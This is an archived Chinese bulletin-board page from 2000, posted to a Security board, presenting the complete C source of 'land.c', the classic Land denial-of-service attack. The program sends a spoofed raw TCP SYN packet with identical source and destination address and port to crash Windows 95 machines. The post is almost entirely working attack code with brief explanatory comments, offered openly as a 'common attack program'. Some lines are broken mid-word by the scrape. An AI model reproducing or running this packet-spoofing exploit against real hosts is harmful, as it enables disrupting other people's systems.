📄 354.htm
字号:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="355.htm">下一篇</a>]
<hr><p align="left"><small>发信人: Luther (国际竞争不信眼泪), 信区: Security <br>
标 题: 常用攻击程序----Land源代码 <br>
发信站: 武汉白云黄鹤站 (Sun Apr 2 18:51:22 2000), 站内信件 <br>
<br>
Land.c <br>
<br>
攻击一台Win95的机器。这是Win95的一个漏洞,以其IP地址和端口向自 <br>
己的同一个端口发起连接(发SYN),Win95即会崩溃。 <br>
/* land.c by m3lt, FLC <br>
crashes a win95 box */ <br>
#include <stdio.h> <br>
#include <netdb.h> <br>
#include <arpa/inet.h> <br>
#include <netinet/in.h> <br>
#include <sys/types.h> <br>
#include <sys/socket.h> <br>
#include <netinet/ip.h> <br>
#include <netinet/tcp.h> <br>
//用于TCP校验和的伪头 <br>
struct pseudohdr <br>
{ <br>
struct in_addr saddr; <br>
struct in_addr daddr; <br>
u_char zero; <br>
u_char protocol; <br>
u_short length; <br>
struct tcphdr tcpheader; <br>
}; <br>
//计算IP校验和 <br>
u_short checksum(u_short * data,u_short length) <br>
{ <br>
register long value; <br>
u_short i; <br>
for(i=0;i<(length>>1);i++) <br>
value+=data[i]; <br>
if((length&1)==1) <br>
value+=(data[i]<<8); <br>
value=(value&65535)+(value>>16); <br>
return(~value); <br>
} <br>
int main(int argc,char * * argv) <br>
{ <br>
struct sockaddr_in sin; <br>
struct hostent * hoste; <br>
int sock; <br>
char buffer[40]; <br>
struct iphdr * ipheader=(struct iphdr *) buffer; <br>
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct ip <br>
hdr)); <br>
struct pseudohdr pseudoheader; <br>
fprintf(stderr,"land.c by m3lt, FLC\n"); <br>
if(argc<3) <br>
{ <br>
fprintf(stderr,"usage: %s IP port\n",argv[0]); <br>
return(-1); <br>
} <br>
bzero(&sin,sizeof(struct sockaddr_in)); <br>
sin.sin_family=AF_INET; <br>
if((hoste=gethostbyname(argv[1]))!=NULL) <br>
bcopy(hoste->h_addr,&sin.sin_addr,hoste->h_length); <br>
else if((sin.sin_addr.s_addr=inet_addr(argv[1]))==-1) <br>
{ <br>
fprintf(stderr,"unknown host %s\n",argv[1]); <br>
return(-1); <br>
} <br>
if((sin.sin_port=htons(atoi(argv[2])))==0) <br>
{ <br>
{ <br>
fprintf(stderr,"unknown port %s\n",argv[2]); <br>
return(-1); <br>
} <br>
//new一个SOCK-RAW以发伪造IP包 这需要root权限 <br>
if((sock=socket(AF_INET,SOCK_RAW,255))==-1) <br>
{ <br>
fprintf(stderr,"couldn't allocate raw socket\n"); <br>
return(-1); <br>
} <br>
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr)); <br>
ipheader->version=4; <br>
ipheader->ihl=sizeof(struct iphdr)/4; <br>
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr)); <br>
<br>
ipheader->id=htons(0xF1C); <br>
ipheader->ttl=255; <br>
ipheader->protocol=IP_TCP; <br>
//目的IP地址和源IP地址相同 <br>
ipheader->saddr=sin.sin_addr.s_addr; <br>
ipheader->daddr=sin.sin_addr.s_addr; <br>
//目的TCP端口和源TCPIP端口相同 <br>
tcpheader->th_sport=sin.sin_port; <br>
tcpheader->th_dport=sin.sin_port; <br>
tcpheader->th_seq=htonl(0xF1C); <br>
tcpheader->th_flags=TH_SYN; <br>
tcpheader->th_off=sizeof(struct tcphdr)/4; <br>
tcpheader->th_win=htons(2048); <br>
bzero(&pseudoheader,12+sizeof(struct tcphdr)); <br>
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr; <br>
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr; <br>
pseudoheader.protocol=6; <br>
pseudoheader.length=htons(sizeof(struct tcphdr)); <br>
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(str <br>
uct tcphdr)); <br>
tcpheader->th_sum=checksum((u_short *) &pseudoheader,12+sizeof(struc <br>
t tcphdr)); <br>
if(sendto(sock,buffer,sizeof(struct iphdr)+sizeof(struct tcphdr), <br>
0,(struct sockaddr *) &sin,sizeof(struct sockaddr_in))==-1) <br>
{ <br>
fprintf(stderr,"couldn't send packet\n"); <br>
return(-1); <br>
} <br>
fprintf(stderr,"%s:%s landed\n",argv[1],argv[2]); <br>
close(sock); <br>
return(0); <br>
} <br>
<br>
-- <br>
┏┓ ┏┓ ━┓ ┏┓ ━┓ ォォ <br>
┃┃ ┃┃┃┃ 珐畅 З哗咯 ┃ ━┫ ┃ ━ ┃ <br>
┗┓ ┛┃ ┃┃ З畅珐 ┃ ━┫ 签珐 <br>
━┛ ━━┛ ┗┛ 哗咯哗 ━━┛ 哗咯哗 <br>
<br>
<br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="343.htm">上一层</a>][<a href="355.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -